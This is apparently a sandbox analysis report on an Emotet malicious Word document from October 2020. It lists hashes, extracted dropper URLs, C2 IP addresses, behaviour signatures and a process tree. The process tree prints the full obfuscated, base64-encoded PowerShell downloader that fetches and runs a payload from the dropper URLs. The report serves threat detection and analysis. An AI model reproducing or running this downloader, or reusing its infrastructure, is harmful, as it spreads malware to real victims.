Analysis

  • max time kernel
    136s
  • max time network
    146s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    30-10-2020 13:01

General

  • Target

    emotet_e1_dfd539a7d82b252f02924f5f2da0724ffe381df1456f08415266b0040d0a914b_2020-10-30__125817440243._doc.doc

  • Size

    208KB

  • MD5

    629397193e4445a719af0c3b08d03666

  • SHA1

    05e7aa8f51f1fe2d939b6efbe87d351cd2dbe73e

  • SHA256

    dfd539a7d82b252f02924f5f2da0724ffe381df1456f08415266b0040d0a914b

  • SHA512

    dcfc7f1e181a971153e778002a90dd77ff702339bb66b81ce44520d1236897677228b17e7d28f8cc132323e105cacfc76970928d23fa805fca6fe741304e7912

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://kharazmischl.com/w/okz/

exe.dropper

http://help-m2c.eccang.com/pseovck27kr/n/

exe.dropper

http://myfarasan.com/sitepage/z/

exe.dropper

http://chengmikeji.com/dertouqua/Ocm/

exe.dropper

https://enews.enkj.com/wordpress/bd/

exe.dropper

http://ecobaratocanaria.com/wp-admin/ms/

exe.dropper

https://cimsjr.com/hospital/4q/

Extracted

Family

emotet

Botnet

Epoch1

C2

190.202.229.74:80

118.69.11.81:7080

70.39.251.94:8080

87.230.25.43:8080

94.23.62.116:8080

37.187.161.206:8080

45.46.37.97:80

138.97.60.141:7080

177.144.130.105:8080

169.1.39.242:80

209.236.123.42:8080

202.134.4.210:7080

193.251.77.110:80

2.45.176.233:80

217.13.106.14:8080

189.223.16.99:80

190.101.156.139:80

77.238.212.227:80

181.58.181.9:80

37.183.81.217:80

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Emotet Payload 2 IoCs

    Detects Emotet payload in memory.

  • Blacklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e1_dfd539a7d82b252f02924f5f2da0724ffe381df1456f08415266b0040d0a914b_2020-10-30__125817440243._doc.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:3976
  • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
    POwersheLL -windowstyle hidden -ENCOD IABzAGUAdAAtAEkAdABlAE0AIABWAEEAcgBpAEEAQgBMAGUAOgBTAE4AbQBrAGgAIAAgACgAWwBUAFkAUABFAF0AKAAiAHsAMQB9AHsAMwB9AHsANAB9AHsAMAB9AHsAMgB9ACIAIAAtAEYAJwBlAEMAVAAnACwAJwBTAFkAUwBUAEUAbQAuAEkAbwAuACcALAAnAG8AcgBZACcALAAnAGQAJwAsACcASQBSACcAKQApADsAIAAgACQARQBrAGIAOQBMAHEAPQAgACAAWwBUAHkAUABFAF0AKAAiAHsAMgB9AHsANAB9AHsAMAB9AHsAMwB9AHsANwB9AHsAMQB9AHsANgB9AHsANQB9ACIAIAAtAGYAJwBzAGUAcgB2ACcALAAnAE8AaQBOACcALAAnAFMAWQBzAHQAZQBtAC4AJwAsACcAaQBDACcALAAnAE4AZQB0AC4AJwAsACcAZwBFAFIAJwAsACcAdABtAGEATgBhACcALAAnAGUAcAAnACkAIAAgADsAIAAgACQASAA3ADYAMQBzADMAegA9ACgAJwBKADAAJwArACgAJwBzAHcAJwArACcAeABlACcAKQArACcAOAAnACkAOwAkAFQAegAwAGoAdwBjAGQAPQAkAE8AMgBzADAAcABoADUAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMwBrADgAdQA0AGUAOwAkAE4AbgBfADEAaABuAGMAPQAoACgAJwBUACcAKwAnAHAAaQAxAHcAJwApACsAJwA2ACcAKwAnADcAJwApADsAIAAgACQAUwBuAE0AawBIADoAOgAiAGMAcgBFAGAAQQBUAEUARABJAGAAUgBgAGUAQwBUAE8AcgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA2ADcAJwArACcAMwBXACcAKwAnAHEAZQAnACkAKwAoACcAdwB6ACcAKwAnAGUAcgAnACkAKwAoACcANgAnACsAJwA3ADMAJwApACsAJwBaACcAKwAoACcAZABvACcAKwAnAHoAMAB4AGYANgAnACsAJwA3ACcAKQArACcAMwAnACkAIAAgAC0AQwByAGUAcABMAGEAQwBFACAAIAAoACcANgAnACsAJwA3ADMAJwApACwAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQARQA0AGYAaABmAGcAZwA9ACgAKAAnAEIAJwArACcAagB0ADIAJwApACsAKAAnAHMANAAnACsAJwBlACcAKQApADsAIAAgACQAZQBrAGIAOQBMAHEAOgA6ACIAUwBFAEMAVQBSAEkAVABZAFAAUgBPAGAAVABPAEMAYABPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAFYAbwBjAGoAZgBnAG4APQAoACgAJwBSAHEAaQAnACsAJwBfAF8AJwApACsAJwBkADAAJwApADsAJABRAHgAbQBuAHAAdAA0ACAAPQAgACgAKAAnAFgAJwArACcAcAAxACcAKQArACcAMwAnACsAKAAnAHkAJwArACcAOQAwACcAKQApADsAJABGADgAeQAwADYAbQB2AD0AKAAoACcASAAnACsAJwB5ADcAaQAnACkAKwAnADQAdwAnACsAJwAyACcAKQA7ACQASwAwAHQAMQA5AGcAZAA9ACgAKAAnAEgAJwArACcAaAA2ACcAKQArACgAJwBkACcAKwAnAGMAbQAnACkAKwAnADgAJwApADsAJABRADYAYgBqAGsAdwBuAD0AJABIAE8ATQBFACsAKAAoACgAJwBJAEUAdwBXACcAKwAnAHEAZQAnACkAKwAoACcAdwB6ACcAKwAnAGUAcgBJAEUAdwBaAGQAJwArACcAbwAnACkAKwAoACcAegAwACcAKwAnAHgAJwApACsAJwBmACcAKwAoACcASQAnACsAJwBFAHcAJwApACkALQBDAHIARQBwAGwAYQBDAEUAIAAoACcASQBFACcAKwAnAHcAJwApACwAWwBDAEgAYQByAF0AOQAyACkAKwAkAFEAeABtAG4AcAB0ADQAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAEwAegBiAGkAcwBwAG0APQAoACgAJwBXACcAKwAnAGsAegAnACkAKwAnAGwAJwArACgAJwBoADIAJwArACcAdAAnACkAKQA7ACQASgA4AGYAMgBxADIAbgA9AC4AKAAnAG4AZQB3AC0AbwBiAGoAJwArACcAZQBjACcAKwAnAHQAJwApACAAbgBFAFQALgBXAEUAQgBjAEwAaQBFAG4AdAA7ACQAQwBuAHcAYQBtAGwAYQA9ACgAJwBoAHQAJwArACcAdAAnACsAJwBwADoAJwArACgAKAAnAF0AWwAnACsAJwAoACcAKQApACsAKAAoACcAcwApACcAKwAnAF0AdwBdACcAKQApACsAJwBbACcAKwAoACcAKABzACkAXQAnACsAJwB3AGsAJwArACcAaABhAHIAYQB6AG0AaQAnACsAJwBzAGMAJwApACsAKAAnAGgAbAAnACsAJwAuACcAKQArACcAYwBvACcAKwAoACgAJwBtACcAKwAnAF0AWwAoAHMAJwApACkAKwAnACkAJwArACgAJwBdAHcAJwArACcAdwAnACkAKwAoACgAJwBdAFsAJwArACcAKAAnACkAKQArACgAKAAnAHMAKQAnACkAKQArACgAJwBdACcAKwAnAHcAbwBrACcAKQArACgAKAAnAHoAXQBbACcAKwAnACgAJwApACkAKwAoACgAJwBzACkAJwApACkAKwAoACcAXQAnACsAJwB3AEAAJwApACsAJwBoAHQAJwArACcAdAAnACsAKAAnAHAAJwArACcAOgBdACcAKQArACgAJwBbACgAcwApAF0AdwAnACsAJwBdACcAKQArACgAJwBbACgAcwApACcAKwAnAF0AdwAnACkAKwAnAGgAZQAnACsAKAAnAGwAJwArACcAcAAtAG0AMgAnACsAJwBjAC4AZQBjACcAKQArACgAJwBjACcAKwAnAGEAbgAnACkAKwAoACcAZwAuAGMAJwArACcAbwAnACsAJwBtAF0AWwAoAHMAJwArACcAKQBdAHcAJwApACsAKAAnAHAAcwBlACcAKwAnAG8AJwApACsAKAAnAHYAYwBrADIANwAnACsAJwBrACcAKwAnAHIAJwApACsAKAAnAF0AWwAnACsAJwAoAHMAKQBdACcAKQArACgAJwB3AG4AJwArACcAXQBbACgAcwApACcAKwAnAF0AdwAnACkAKwAnAEAAJwArACgAJwBoACcAKwAnAHQAdABwADoAXQAnACkAKwAoACgAJwBbACcAKwAnACgAcwAnACkAKQArACgAKAAnACkAXQAnACkAKQArACcAdwAnACsAKAAnAF0AJwArACcAWwAoAHMAKQBdAHcAJwApACsAJwBtACcAKwAnAHkAJwArACgAJwBmACcAKwAnAGEAcgBhAHMAJwApACsAJwBhACcAKwAoACcAbgAuACcAKwAnAGMAbwBtACcAKQArACcAXQBbACcAKwAoACcAKAAnACsAJwBzACkAXQB3AHMAJwApACsAJwBpACcAKwAoACcAdAAnACsAJwBlAHAAJwApACsAJwBhACcAKwAoACcAZwBlAF0AWwAoAHMAJwArACcAKQBdACcAKQArACcAdwB6ACcAKwAoACgAJwBdAFsAJwArACcAKAAnACkAKQArACgAKAAnAHMAKQAnACsAJwBdAHcAJwApACkAKwAnAEAAaAAnACsAJwB0ACcAKwAnAHQAcAAnACsAKAAnADoAXQAnACsAJwBbACcAKQArACgAJwAoAHMAKQAnACsAJwBdACcAKQArACcAdwAnACsAJwBdAFsAJwArACgAJwAoAHMAKQAnACsAJwBdACcAKwAnAHcAYwBoACcAKQArACcAZQAnACsAJwBuAGcAJwArACcAbQBpACcAKwAoACcAawBlACcAKwAnAGoAJwApACsAJwBpACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAJwBtACcAKwAoACcAXQAnACsAJwBbACgAcwApACcAKQArACgAJwBdAHcAJwArACcAZAAnACkAKwAoACcAZQAnACsAJwByAHQAJwApACsAKAAnAG8AJwArACcAdQBxACcAKQArACgAJwB1AGEAJwArACcAXQAnACkAKwAoACcAWwAoAHMAKQAnACsAJwBdAHcAJwApACsAJwBPACcAKwAoACgAJwBjAG0AJwArACcAXQBbACgAJwApACkAKwAoACgAJwBzACkAXQB3AEAAaAAnACsAJwB0ACcAKQApACsAJwB0ACcAKwAnAHAAJwArACcAcwA6ACcAKwAnAF0AWwAnACsAJwAoACcAKwAoACgAJwBzACkAJwApACkAKwAoACcAXQB3AF0AJwArACcAWwAnACkAKwAnACgAJwArACcAcwAnACsAJwApACcAKwAoACcAXQB3AGUAbgAnACsAJwBlAHcAcwAuACcAKQArACcAZQAnACsAJwBuACcAKwAoACcAawBqAC4AYwAnACsAJwBvACcAKQArACgAJwBtACcAKwAnAF0AJwArACcAWwAoAHMAKQBdACcAKQArACcAdwAnACsAKAAnAHcAbwByACcAKwAnAGQAJwArACcAcAByAGUAcwBzACcAKQArACcAXQBbACcAKwAoACgAJwAoAHMAJwApACkAKwAoACgAJwApAF0AJwApACkAKwAnAHcAJwArACcAYgAnACsAJwBkAF0AJwArACgAKAAnAFsAKAAnACkAKQArACgAKAAnAHMAKQAnACkAKQArACgAJwBdACcAKwAnAHcAQAAnACkAKwAnAGgAJwArACgAKAAnAHQAdABwADoAJwArACcAXQBbACcAKwAnACgAJwApACkAKwAnAHMAJwArACgAKAAnACkAXQB3ACcAKwAnAF0AWwAnACsAJwAoAHMAKQAnACkAKQArACgAJwBdAHcAJwArACcAZQBjAG8AJwApACsAJwBiACcAKwAoACcAYQAnACsAJwByAGEAJwApACsAJwB0ACcAKwAnAG8AYwAnACsAKAAnAGEAbgAnACsAJwBhACcAKQArACgAJwByACcAKwAnAGkAYQAnACkAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwBdACcAKQArACgAKAAnAFsAKAAnACkAKQArACcAcwAnACsAKAAoACcAKQBdACcAKwAnAHcAdwBwACcAKwAnAC0AYQBkAG0AaQAnACkAKQArACgAJwBuAF0AJwArACcAWwAnACkAKwAoACgAJwAoAHMAKQBdAHcAbQBzAF0AJwArACcAWwAnACsAJwAoACcAKwAnAHMAKQBdACcAKwAnAHcAJwArACcAQABoAHQAdABwAHMAJwArACcAOgBdAFsAKAAnACkAKQArACgAKAAnAHMAKQAnACkAKQArACcAXQB3ACcAKwAnAF0AJwArACgAKAAnAFsAKAAnACkAKQArACgAKAAnAHMAKQAnACsAJwBdACcAKQApACsAKAAnAHcAJwArACcAYwBpAG0AcwBqACcAKQArACcAcgAuACcAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAoACcAXQAnACsAJwBbACgAcwAnACkAKQArACgAKAAnACkAXQB3ACcAKwAnAGgAJwApACkAKwAnAG8AJwArACcAcwAnACsAKAAnAHAAaQB0ACcAKwAnAGEAJwApACsAKAAnAGwAXQBbACcAKwAnACgAcwApAF0AJwArACcAdwA0AHEAJwApACsAKAAoACcAXQAnACsAJwBbACgAcwAnACkAKQArACgAKAAnACkAJwArACcAXQB3ACcAKQApACkALgAiAFIAYABlAFAAbABgAEEAYwBlACIAKAAoACcAXQBbACcAKwAoACcAKAAnACsAJwBzACkAJwApACsAJwBdAHcAJwApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwB4AHcAJwArACcAZQAnACkAKQBbADAAXQApAC4AIgBTAHAAYABsAGkAdAAiACgAJABSADEAbgB6AG8AagBxACAAKwAgACQAVAB6ADAAagB3AGMAZAAgACsAIAAkAFYAegB6AHgAcwBzADcAKQA7ACQAVQAwADQAZQB1AHQAcwA9ACgAJwBRACcAKwAoACcAaAAnACsAJwA2AHkAcwAnACkAKwAnADMAMwAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEMAYwBvAHUAbgAzAGMAIABpAG4AIAAkAEMAbgB3AGEAbQBsAGEAKQB7AHQAcgB5AHsAJABKADgAZgAyAHEAMgBuAC4AIgBEAE8AYABXAGAATgBsAG8AQQBkAGAARgBJAEwARQAiACgAJABDAGMAbwB1AG4AMwBjACwAIAAkAFEANgBiAGoAawB3AG4AKQA7ACQAUgB2AHAAbgBfAGgAdAA9ACgAJwBHAGIAJwArACgAJwBvADUAJwArACcAMgB6ACcAKQArACcANgAnACkAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAUQA2AGIAagBrAHcAbgApAC4AIgBMAGAARQBOAEcAdABIACIAIAAtAGcAZQAgADMANwAwADgANAApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AKAAoACcAdwAnACsAJwBpAG4AMwAnACkAKwAoACcAMgAnACsAJwBfAFAAcgAnACsAJwBvAGMAZQBzACcAKQArACcAcwAnACkAKQAuACIAYwBgAFIAZQBBAHQARQAiACgAJABRADYAYgBqAGsAdwBuACkAOwAkAFMAdABpADAAcAAxAGYAPQAoACcASQAnACsAJwBjAGcAJwArACgAJwBvADMAcwAnACsAJwBjACcAKQApADsAYgByAGUAYQBrADsAJABEADAAOQBkAHQAMAB2AD0AKAAnAFAANgAnACsAKAAnAHQAJwArACcAZQB6AGsAMAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATgBrADMAagB0AHUAawA9ACgAKAAnAEcAJwArACcAZgB5AGUAbQAnACkAKwAnADQAJwArACcAcgAnACkA
    1⤵
    • Process spawned unexpected child process
    • Blacklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:3844
  • C:\Users\Admin\Wqewzer\Zdoz0xf\Xp13y90.exe
    C:\Users\Admin\Wqewzer\Zdoz0xf\Xp13y90.exe
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2768
    • C:\Windows\SysWOW64\netjoin\finger.exe
      "C:\Windows\SysWOW64\netjoin\finger.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      PID:4068

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\Wqewzer\Zdoz0xf\Xp13y90.exe
    MD5

    adc67e5610494dbbaff4b193f7b81f93

    SHA1

    6d98ac46c3eeba15b489b1807e8758722de6c64b

    SHA256

    4cc73bcf80bccf8a54ac21b6e66511ef1235a3d81bd36189c5d4d19bbc2f59c1

    SHA512

    54077c5371a4c477592120fd741e424e70dee9c7c8ebf82b29395334d767698495b10af6da8d241f3598d229eeee6e446dc2dfb04f82a53b4fec4d26293112ce

  • C:\Users\Admin\Wqewzer\Zdoz0xf\Xp13y90.exe
    MD5

    adc67e5610494dbbaff4b193f7b81f93

    SHA1

    6d98ac46c3eeba15b489b1807e8758722de6c64b

    SHA256

    4cc73bcf80bccf8a54ac21b6e66511ef1235a3d81bd36189c5d4d19bbc2f59c1

    SHA512

    54077c5371a4c477592120fd741e424e70dee9c7c8ebf82b29395334d767698495b10af6da8d241f3598d229eeee6e446dc2dfb04f82a53b4fec4d26293112ce

  • C:\Windows\SysWOW64\netjoin\finger.exe
    MD5

    adc67e5610494dbbaff4b193f7b81f93

    SHA1

    6d98ac46c3eeba15b489b1807e8758722de6c64b

    SHA256

    4cc73bcf80bccf8a54ac21b6e66511ef1235a3d81bd36189c5d4d19bbc2f59c1

    SHA512

    54077c5371a4c477592120fd741e424e70dee9c7c8ebf82b29395334d767698495b10af6da8d241f3598d229eeee6e446dc2dfb04f82a53b4fec4d26293112ce

  • memory/2768-17-0x0000000002130000-0x0000000002140000-memory.dmp
    Filesize

    64KB

  • memory/3844-9-0x00007FFC95D00000-0x00007FFC966EC000-memory.dmp
    Filesize

    9.9MB

  • memory/3844-10-0x00000255FA130000-0x00000255FA131000-memory.dmp
    Filesize

    4KB

  • memory/3844-11-0x00000255FA2E0000-0x00000255FA2E1000-memory.dmp
    Filesize

    4KB

  • memory/3976-0-0x00007FFC9E0E0000-0x00007FFC9E717000-memory.dmp
    Filesize

    6.2MB

  • memory/3976-5-0x00000158315B9000-0x00000158315BF000-memory.dmp
    Filesize

    24KB

  • memory/4068-18-0x0000000000000000-mapping.dmp
  • memory/4068-23-0x0000000002770000-0x0000000002780000-memory.dmp
    Filesize

    64KB